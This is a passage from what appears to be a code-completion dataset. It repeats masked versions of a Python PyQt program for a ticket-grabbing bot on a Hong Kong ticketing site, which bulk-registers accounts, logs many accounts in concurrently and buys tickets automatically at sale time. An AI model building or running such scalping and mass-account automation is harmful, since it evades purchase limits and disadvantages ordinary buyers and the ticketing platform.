if i.isChecked():\n for eventDate in self.eventDateList:\n if eventDate['eventDateName'] == i.text():\n if 'saleDate' in eventDate:\n self.saleTime = eventDate['saleDate']\n self.eventUrl.append(eventDate['eventUrl'])\n self.sessionName.append(eventDate['eventDateName'])\n for i in self.priceListEvn:\n if i.isChecked():\n if i.text() in self.eventDateList[0]['priceList']:\n self.eventPrice.append(str(self.eventDateList[0][\n 'priceList'].index(i.text())))\n self.sessionPrice.append(i.text())\n if self.eventPrice and self.eventUrl:\n self.close()\n else:\n res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?',\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n self.close()\n else:\n print('输入内容不存在!')\n\n def changecb1(self):\n if self.cb1.checkState() == Qt.Checked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(True)\n elif self.cb1.checkState() == Qt.Unchecked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(False)\n\n def changecb2(self):\n if self.cb2.checkState() == Qt.Checked:\n for qcb in self.priceListEvn:\n qcb.setChecked(True)\n elif self.cb2.checkState() == Qt.Unchecked:\n for qcb in self.priceListEvn:\n qcb.setChecked(False)\n\n def refresh_cb(self):\n while True:\n if self.sessionList and self.priceList:\n self.create_c()\n break\n time.sleep(0.2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Worker(QThread):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Ui_MainWindow(QMainWindow):\n threads = []\n keywordJudge = ''\n\n def __init__(self):\n super(Ui_MainWindow, self).__init__()\n self.buy_succeed_count = 0\n for func in [self.output_buy_record, self.output_login_status, self\n .output_register_record]:\n thr = Thread(target=func)\n thr.setDaemon(True)\n thr.start()\n self._thread = Worker(self)\n self._thread.finished.connect(self._thread.deleteLater)\n self._thread.valueChanged.connect(ex.create_c)\n self._thread.start()\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName('MainWindow')\n MainWindow.resize(640, 478)\n MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n MainWindow.setFixedSize(self.width(), self.height())\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName('centralwidget')\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))\n self.tabWidget.setObjectName('tabWidget')\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName('tab')\n self.pushButton = QtWidgets.QPushButton(self.tab)\n self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton.setObjectName('pushButton')\n self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)\n self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab.setPlaceholderText(' 请输入登陆个数')\n self.label_0 = QtWidgets.QLabel(self.tab)\n self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_0.setObjectName('label_0')\n self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)\n self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_2.setObjectName('textBrowser_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName('tab_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_3 = QtWidgets.QWidget()\n self.tab_3.setObjectName('tab_3')\n self.lineEdit = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))\n self.lineEdit.setObjectName('lineEdit')\n self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))\n self.pushButton_2.setObjectName('pushButton_2')\n self.pushButton_2.clicked.connect(self.search_1)\n self.label = QtWidgets.QLabel(self.tab_2)\n self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))\n self.label.setObjectName('label')\n self.label_2 = QtWidgets.QLabel(self.tab_2)\n self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))\n self.label_2.setObjectName('label_2')\n self.comboBox = QtWidgets.QComboBox(self.tab_2)\n self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))\n self.comboBox.setObjectName('comboBox')\n self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)\n self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))\n self.comboBox_2.setObjectName('comboBox_2')\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))\n self.label_3.setObjectName('label_3')\n self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))\n self.lineEdit_1.setObjectName('lineEdit_1')\n self.label_6 = QtWidgets.QLabel(self.tab_2)\n self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))\n self.label_6.setObjectName('label_6')\n self.label_7 = QtWidgets.QLabel(self.tab_2)\n self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))\n self.label_7.setObjectName('label_7')\n self.label_7.setStyleSheet('font-size:16px;color:red')\n self.label_8 = QtWidgets.QLabel(self.tab_2)\n self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))\n self.label_8.setObjectName('label_8')\n self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))\n self.lineEdit_8.setObjectName('lineEdit_8')\n self.lineEdit_8.setText('4')\n self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_3.setGeometry(QtCore.QRect(30, 160, 54, 31))\n self.pushButton_3.setObjectName('pushButton_3')\n self.pushButton_3.clicked.connect(self.search_2)\n self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))\n self.pushButton_quit.setObjectName('pushButton_quit')\n self.pushButton_quit.clicked.connect(self.exit_quit)\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))\n self.label_4.setObjectName('label_4')\n self.textBrowser_1 = QtWidgets.QTextBrowser(self.tab_2)\n self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))\n self.textBrowser_1.setObjectName('textBrowser')\n self.tabWidget.addTab(self.tab_2, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.tabWidget.addTab(self.tab_3, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.pushButton_4 = QtWidgets.QPushButton(self.tab_3)\n self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton_4.setObjectName('pushButton')\n self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)\n self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab3.setPlaceholderText(' 请输入注册个数')\n self.textBrowser_3 = QtWidgets.QTextBrowser(self.tab_3)\n self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_3.setObjectName('textBrowser_3')\n self.label_5 = QtWidgets.QLabel(self.tab_3)\n self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_5.setObjectName('label_5')\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate('MainWindow', '城市售票网-抢票'))\n self.pushButton.setText(_translate('MainWindow', '点击登录'))\n self.pushButton.clicked.connect(self.login)\n self.pushButton_4.clicked.connect(self.register)\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab),\n _translate('MainWindow', '账号登录'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2),\n _translate('MainWindow', '抢购中心'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3),\n _translate('MainWindow', '账号注册'))\n self.label_0.setText(_translate('MainWindow', '登录日志:'))\n self.pushButton_2.setText(_translate('MainWindow', '搜索名称'))\n self.pushButton_3.setText(_translate('MainWindow', '点击购买'))\n self.pushButton_quit.setText(_translate('MainWindow', '退出程序'))\n self.pushButton_4.setText(_translate('MainWindow', '点击注册'))\n self.label.setText(_translate('MainWindow', '已择场次:'))\n self.label_2.setText(_translate('MainWindow', '已择价格:'))\n self.label_3.setText(_translate('MainWindow', '购买总数量:'))\n self.label_4.setText(_translate('MainWindow', '购买日志:'))\n self.label_5.setText(_translate('MainWindow', '注册日志:'))\n self.label_6.setText(_translate('MainWindow', '已购买:'))\n self.label_7.setText(_translate('MainWindow', '0'))\n self.label_8.setText(_translate('MainWindow', '每个账号购买数量:'))\n self.textBrowser_3.setText('')\n self.textBrowser_2.setText('')\n self.textBrowser_1.setText('')\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def login(self):\n try:\n regiterSum = int(self.lineEdit_tab.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n ipList = ['']\n self.textBrowser_2.append('开始登陆,请等待...')\n userinfo_list = []\n with open('infomation.txt', 'rt', encoding='utf-8') as f:\n info_record = re.findall(\"'loginId': '(.*?)'\", f.read())\n for loginId in info_record:\n userinfo_list.append(loginId)\n for thr in userinfo_list[:regiterSum]:\n grabber = BuyUrbtix()\n ip = random.choice(ipList)\n Thread_name = Thread(target=grabber.openSite, args=(thr, ip))\n self.threads.append(Thread_name)\n Thread_name.setDaemon(True)\n Thread_name.start()\n\n def search_1(self):\n keyword = self.lineEdit.text()\n self.textBrowser_1.append('正在查询 %s 的所有场次和价格...' % keyword)\n if keyword == self.keywordJudge:\n self.textBrowser_1.append('请等待...')\n self.keywordJudge = ''\n return\n self.keywordJudge = keyword\n Thread_name = Thread(target=self.refresh)\n self.threads.append(Thread_name)\n Thread_name.start()\n Thread_01 = Thread(target=self.show_session_data)\n self.threads.append(Thread_01)\n Thread_01.start()\n\n def show_session_data(self):\n global SHOW_S_P\n self.comboBox_2.clear()\n self.comboBox.clear()\n while True:\n if ex.sessionName and ex.sessionPrice and SHOW_S_P:\n for i, eventDateName in enumerate(ex.sessionName):\n self.comboBox_2.addItem(eventDateName, i)\n for i, price in enumerate(ex.sessionPrice):\n self.comboBox.addItem(str(price), i)\n self.comboBox.setCurrentIndex(0)\n self.comboBox_2.setCurrentIndex(0)\n ex.sessionName.clear()\n ex.sessionPrice.clear()\n SHOW_S_P = False\n time.sleep(0.2)\n\n def refresh(self):\n try:\n if self.lineEdit.text():\n global eventDateList\n keyword = self.lineEdit.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n ex.eventDateList = request_spider.get_date_url(keyword)\n if ex.eventDateList:\n self.textBrowser_1.append('查询成功,请在选择界面选择场次和价格...')\n global SESSION_DATA\n SESSION_DATA = True\n else:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n else:\n sys.exit()\n except Exception as err:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n print(err)\n sys.exit()\n\n def output_login_status(self):\n while True:\n login_record_list = login_record()\n if login_record_list:\n for i in login_record_list:\n self.textBrowser_2.append(i)\n self.textBrowser_2.moveCursor(self.textBrowser_2.\n textCursor().End)\n login_record_list.remove(i)\n time.sleep(0.1)\n\n def output_buy_record(self):\n while True:\n buy_record_list = buy_record()\n if buy_record_list:\n for record in buy_record_list:\n if '购买成功' in record:\n self.buy_succeed_count += 1\n self.label_7.setText(str(self.buy_succeed_count))\n self.textBrowser_1.append(record)\n self.textBrowser_1.moveCursor(self.textBrowser_1.\n textCursor().End)\n buy_record_list.remove(record)\n time.sleep(0.1)\n\n def output_register_record(self):\n while True:\n register_record_list = register_record()\n if register_record_list:\n for i in register_record_list:\n self.textBrowser_3.append(i)\n self.textBrowser_3.moveCursor(self.textBrowser_3.\n textCursor().End)\n register_record_list.remove(i)\n time.sleep(0.1)\n\n def search_2(self):\n if not self.lineEdit_1.text():\n self.textBrowser_1.append('请输入购买总数量...')\n return\n if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:\n self.textBrowser_1.append('正在购买,请等待...')\n return\n if ex.saleTime:\n Thread_name = Thread(target=self.wait_sale)\n Thread_name.setDaemon(True)\n Thread_name.start()\n return\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def wait_sale(self):\n dateList = ex.saleTime\n print('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n while True:\n saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) +\n '0000', '%Y%m%d%H%M%S')))\n if saleTimestamp <= int(time.time()):\n print('%s年%s月%s日%s时开始售票,开始购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,开始购买!' % tuple(\n dateList))\n break\n time.sleep(1)\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def register(self):\n self.textBrowser_3.append('开始注册,请等待...')\n try:\n regiterSum = int(self.lineEdit_tab3.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n threads = []\n for _ in range(regiterSum):\n uper = Register()\n Thread_name = Thread(target=uper.registerInfo)\n Thread_name.setDaemon(True)\n Thread_name.start()\n threads.append(Thread_name)\n\n def exit_quit(self):\n global EXIT_COND\n res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.\n Yes | QMessageBox.No)\n if res == QMessageBox.Yes:\n self._thread.exit_thread()\n time.sleep(1)\n sys.exit()\n else:\n pass\n\n\nclass Example(QMainWindow):\n sessionList = []\n priceList = []\n sessionListEvn = []\n priceListEvn = []\n eventDateList = []\n eventUrl = []\n eventPrice = []\n sessionName = []\n sessionPrice = []\n saleTime = []\n buyNum = 1\n\n def __init__(self):\n super(QMainWindow, self).__init__()\n self.setWindowTitle('城市售票网')\n self.resize(680, 800)\n self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n self.setFixedSize(self.width(), self.height())\n self.w = QWidget()\n self.w.setFixedWidth(680)\n self.w.setFixedHeight(540)\n self.setCentralWidget(self.w)\n self.topFiller = QWidget()\n self.scroll = QScrollArea()\n self.scroll.setWidget(self.topFiller)\n self.vbox = QVBoxLayout()\n self.vbox.addWidget(self.scroll)\n self.w.setLayout(self.vbox)\n self.initUI()\n\n def closeEvent(self, QCloseEvent):\n res = QMessageBox.question(self, '提示', '您确定选择无误吗?', QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n global SHOW_S_P\n SHOW_S_P = True\n QCloseEvent.accept()\n self.cb1.setChecked(False)\n self.cb2.setChecked(False)\n else:\n QCloseEvent.ignore()\n\n def initUI(self):\n self.cb1 = QCheckBox('全选', self.topFiller)\n self.cb1.move(20, 30)\n self.cb2 = QCheckBox('全选', self)\n self.cb2.move(20, 570)\n bt1 = QPushButton('确定', self)\n bt2 = QPushButton('刷新', self)\n bt1.move(20, 760)\n bt2.move(120, 760)\n self.cb1.stateChanged.connect(self.changecb1)\n self.cb2.stateChanged.connect(self.changecb2)\n bt1.clicked.connect(self.pitch_on)\n bt2.clicked.connect(self.create_c)\n\n def create_c(self):\n if self.eventDateList:\n self.sessionList = [eventDateName['eventDateName'] for\n eventDateName in self.eventDateList]\n self.priceList = [price for price in self.eventDateList[0][\n 'priceList']]\n ex.show()\n else:\n ex.show()\n QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)\n return\n if self.sessionListEvn and self.priceListEvn:\n for s_evn in self.sessionListEvn:\n s_evn.deleteLater()\n for p_evn in self.priceListEvn:\n p_evn.deleteLater()\n self.sessionListEvn.clear()\n self.priceListEvn.clear()\n self.eventPrice.clear()\n self.eventUrl.clear()\n for i, item in enumerate(self.sessionList):\n cb = QCheckBox(item, self.topFiller)\n cb.move(30, 60 + 30 * i)\n self.sessionListEvn.append(cb)\n cb.show()\n self.topFiller.setMinimumSize(580, (len(self.sessionList) + 5) * 30)\n for i, item in enumerate(self.priceList):\n cb_1 = QCheckBox(str(item), self)\n if i % 2 == 0:\n i = i // 2 + 1\n cb_1.move(30, 570 + 30 * i)\n else:\n i = i // 2 + 1\n cb_1.move(330, 570 + 30 * i)\n self.priceListEvn.append(cb_1)\n cb_1.show()\n\n def pitch_on(self):\n if self.sessionList:\n for i in self.sessionListEvn:\n if i.isChecked():\n for eventDate in self.eventDateList:\n if eventDate['eventDateName'] == i.text():\n if 'saleDate' in eventDate:\n self.saleTime = eventDate['saleDate']\n self.eventUrl.append(eventDate['eventUrl'])\n self.sessionName.append(eventDate['eventDateName'])\n for i in self.priceListEvn:\n if i.isChecked():\n if i.text() in self.eventDateList[0]['priceList']:\n self.eventPrice.append(str(self.eventDateList[0][\n 'priceList'].index(i.text())))\n self.sessionPrice.append(i.text())\n if self.eventPrice and self.eventUrl:\n self.close()\n else:\n res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?',\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n self.close()\n else:\n print('输入内容不存在!')\n\n def changecb1(self):\n if self.cb1.checkState() == Qt.Checked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(True)\n elif self.cb1.checkState() == Qt.Unchecked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(False)\n\n def changecb2(self):\n if self.cb2.checkState() == Qt.Checked:\n for qcb in self.priceListEvn:\n qcb.setChecked(True)\n elif self.cb2.checkState() == Qt.Unchecked:\n for qcb in self.priceListEvn:\n qcb.setChecked(False)\n\n def refresh_cb(self):\n while True:\n if self.sessionList and self.priceList:\n self.create_c()\n break\n time.sleep(0.2)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Worker(QThread):\n valueChanged = pyqtSignal(int)\n handle = -1\n\n def run(self):\n global SESSION_DATA, EXIT_COND\n try:\n self.handle = ctypes.windll.kernel32.OpenThread(win32con.\n PROCESS_ALL_ACCESS, False, int(QThread.currentThreadId()))\n except Exception as e:\n print('get thread handle failed', e)\n while True:\n if SESSION_DATA:\n self.valueChanged.emit(1024)\n SESSION_DATA = False\n time.sleep(0.1)\n\n def exit_thread(self):\n os._exit(122)\n\n\nclass Ui_MainWindow(QMainWindow):\n threads = []\n keywordJudge = ''\n\n def __init__(self):\n super(Ui_MainWindow, self).__init__()\n self.buy_succeed_count = 0\n for func in [self.output_buy_record, self.output_login_status, self\n .output_register_record]:\n thr = Thread(target=func)\n thr.setDaemon(True)\n thr.start()\n self._thread = Worker(self)\n self._thread.finished.connect(self._thread.deleteLater)\n self._thread.valueChanged.connect(ex.create_c)\n self._thread.start()\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName('MainWindow')\n MainWindow.resize(640, 478)\n MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n MainWindow.setFixedSize(self.width(), self.height())\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName('centralwidget')\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))\n self.tabWidget.setObjectName('tabWidget')\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName('tab')\n self.pushButton = QtWidgets.QPushButton(self.tab)\n self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton.setObjectName('pushButton')\n self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)\n self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab.setPlaceholderText(' 请输入登陆个数')\n self.label_0 = QtWidgets.QLabel(self.tab)\n self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_0.setObjectName('label_0')\n self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)\n self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_2.setObjectName('textBrowser_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName('tab_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_3 = QtWidgets.QWidget()\n self.tab_3.setObjectName('tab_3')\n self.lineEdit = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))\n self.lineEdit.setObjectName('lineEdit')\n self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))\n self.pushButton_2.setObjectName('pushButton_2')\n self.pushButton_2.clicked.connect(self.search_1)\n self.label = QtWidgets.QLabel(self.tab_2)\n self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))\n self.label.setObjectName('label')\n self.label_2 = QtWidgets.QLabel(self.tab_2)\n self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))\n self.label_2.setObjectName('label_2')\n self.comboBox = QtWidgets.QComboBox(self.tab_2)\n self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))\n self.comboBox.setObjectName('comboBox')\n self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)\n self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))\n self.comboBox_2.setObjectName('comboBox_2')\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))\n self.label_3.setObjectName('label_3')\n self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))\n self.lineEdit_1.setObjectName('lineEdit_1')\n self.label_6 = QtWidgets.QLabel(self.tab_2)\n self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))\n self.label_6.setObjectName('label_6')\n self.label_7 = QtWidgets.QLabel(self.tab_2)\n self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))\n self.label_7.setObjectName('label_7')\n self.label_7.setStyleSheet('font-size:16px;color:red')\n self.label_8 = QtWidgets.QLabel(self.tab_2)\n self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))\n self.label_8.setObjectName('label_8')\n self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))\n self.lineEdit_8.setObjectName('lineEdit_8')\n self.lineEdit_8.setText('4')\n self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_3.setGeometry(QtCore.QRect(30, 160, 54, 31))\n self.pushButton_3.setObjectName('pushButton_3')\n self.pushButton_3.clicked.connect(self.search_2)\n self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))\n self.pushButton_quit.setObjectName('pushButton_quit')\n self.pushButton_quit.clicked.connect(self.exit_quit)\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))\n self.label_4.setObjectName('label_4')\n self.textBrowser_1 = QtWidgets.QTextBrowser(self.tab_2)\n self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))\n self.textBrowser_1.setObjectName('textBrowser')\n self.tabWidget.addTab(self.tab_2, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.tabWidget.addTab(self.tab_3, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.pushButton_4 = QtWidgets.QPushButton(self.tab_3)\n self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton_4.setObjectName('pushButton')\n self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)\n self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab3.setPlaceholderText(' 请输入注册个数')\n self.textBrowser_3 = QtWidgets.QTextBrowser(self.tab_3)\n self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_3.setObjectName('textBrowser_3')\n self.label_5 = QtWidgets.QLabel(self.tab_3)\n self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_5.setObjectName('label_5')\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate('MainWindow', '城市售票网-抢票'))\n self.pushButton.setText(_translate('MainWindow', '点击登录'))\n self.pushButton.clicked.connect(self.login)\n self.pushButton_4.clicked.connect(self.register)\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab),\n _translate('MainWindow', '账号登录'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2),\n _translate('MainWindow', '抢购中心'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3),\n _translate('MainWindow', '账号注册'))\n self.label_0.setText(_translate('MainWindow', '登录日志:'))\n self.pushButton_2.setText(_translate('MainWindow', '搜索名称'))\n self.pushButton_3.setText(_translate('MainWindow', '点击购买'))\n self.pushButton_quit.setText(_translate('MainWindow', '退出程序'))\n self.pushButton_4.setText(_translate('MainWindow', '点击注册'))\n self.label.setText(_translate('MainWindow', '已择场次:'))\n self.label_2.setText(_translate('MainWindow', '已择价格:'))\n self.label_3.setText(_translate('MainWindow', '购买总数量:'))\n self.label_4.setText(_translate('MainWindow', '购买日志:'))\n self.label_5.setText(_translate('MainWindow', '注册日志:'))\n self.label_6.setText(_translate('MainWindow', '已购买:'))\n self.label_7.setText(_translate('MainWindow', '0'))\n self.label_8.setText(_translate('MainWindow', '每个账号购买数量:'))\n self.textBrowser_3.setText('')\n self.textBrowser_2.setText('')\n self.textBrowser_1.setText('')\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def login(self):\n try:\n regiterSum = int(self.lineEdit_tab.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n ipList = ['']\n self.textBrowser_2.append('开始登陆,请等待...')\n userinfo_list = []\n with open('infomation.txt', 'rt', encoding='utf-8') as f:\n info_record = re.findall(\"'loginId': '(.*?)'\", f.read())\n for loginId in info_record:\n userinfo_list.append(loginId)\n for thr in userinfo_list[:regiterSum]:\n grabber = BuyUrbtix()\n ip = random.choice(ipList)\n Thread_name = Thread(target=grabber.openSite, args=(thr, ip))\n self.threads.append(Thread_name)\n Thread_name.setDaemon(True)\n Thread_name.start()\n\n def search_1(self):\n keyword = self.lineEdit.text()\n self.textBrowser_1.append('正在查询 %s 的所有场次和价格...' % keyword)\n if keyword == self.keywordJudge:\n self.textBrowser_1.append('请等待...')\n self.keywordJudge = ''\n return\n self.keywordJudge = keyword\n Thread_name = Thread(target=self.refresh)\n self.threads.append(Thread_name)\n Thread_name.start()\n Thread_01 = Thread(target=self.show_session_data)\n self.threads.append(Thread_01)\n Thread_01.start()\n\n def show_session_data(self):\n global SHOW_S_P\n self.comboBox_2.clear()\n self.comboBox.clear()\n while True:\n if ex.sessionName and ex.sessionPrice and SHOW_S_P:\n for i, eventDateName in enumerate(ex.sessionName):\n self.comboBox_2.addItem(eventDateName, i)\n for i, price in enumerate(ex.sessionPrice):\n self.comboBox.addItem(str(price), i)\n self.comboBox.setCurrentIndex(0)\n self.comboBox_2.setCurrentIndex(0)\n ex.sessionName.clear()\n ex.sessionPrice.clear()\n SHOW_S_P = False\n time.sleep(0.2)\n\n def refresh(self):\n try:\n if self.lineEdit.text():\n global eventDateList\n keyword = self.lineEdit.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n ex.eventDateList = request_spider.get_date_url(keyword)\n if ex.eventDateList:\n self.textBrowser_1.append('查询成功,请在选择界面选择场次和价格...')\n global SESSION_DATA\n SESSION_DATA = True\n else:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n else:\n sys.exit()\n except Exception as err:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n print(err)\n sys.exit()\n\n def output_login_status(self):\n while True:\n login_record_list = login_record()\n if login_record_list:\n for i in login_record_list:\n self.textBrowser_2.append(i)\n self.textBrowser_2.moveCursor(self.textBrowser_2.\n textCursor().End)\n login_record_list.remove(i)\n time.sleep(0.1)\n\n def output_buy_record(self):\n while True:\n buy_record_list = buy_record()\n if buy_record_list:\n for record in buy_record_list:\n if '购买成功' in record:\n self.buy_succeed_count += 1\n self.label_7.setText(str(self.buy_succeed_count))\n self.textBrowser_1.append(record)\n self.textBrowser_1.moveCursor(self.textBrowser_1.\n textCursor().End)\n buy_record_list.remove(record)\n time.sleep(0.1)\n\n def output_register_record(self):\n while True:\n register_record_list = register_record()\n if register_record_list:\n for i in register_record_list:\n self.textBrowser_3.append(i)\n self.textBrowser_3.moveCursor(self.textBrowser_3.\n 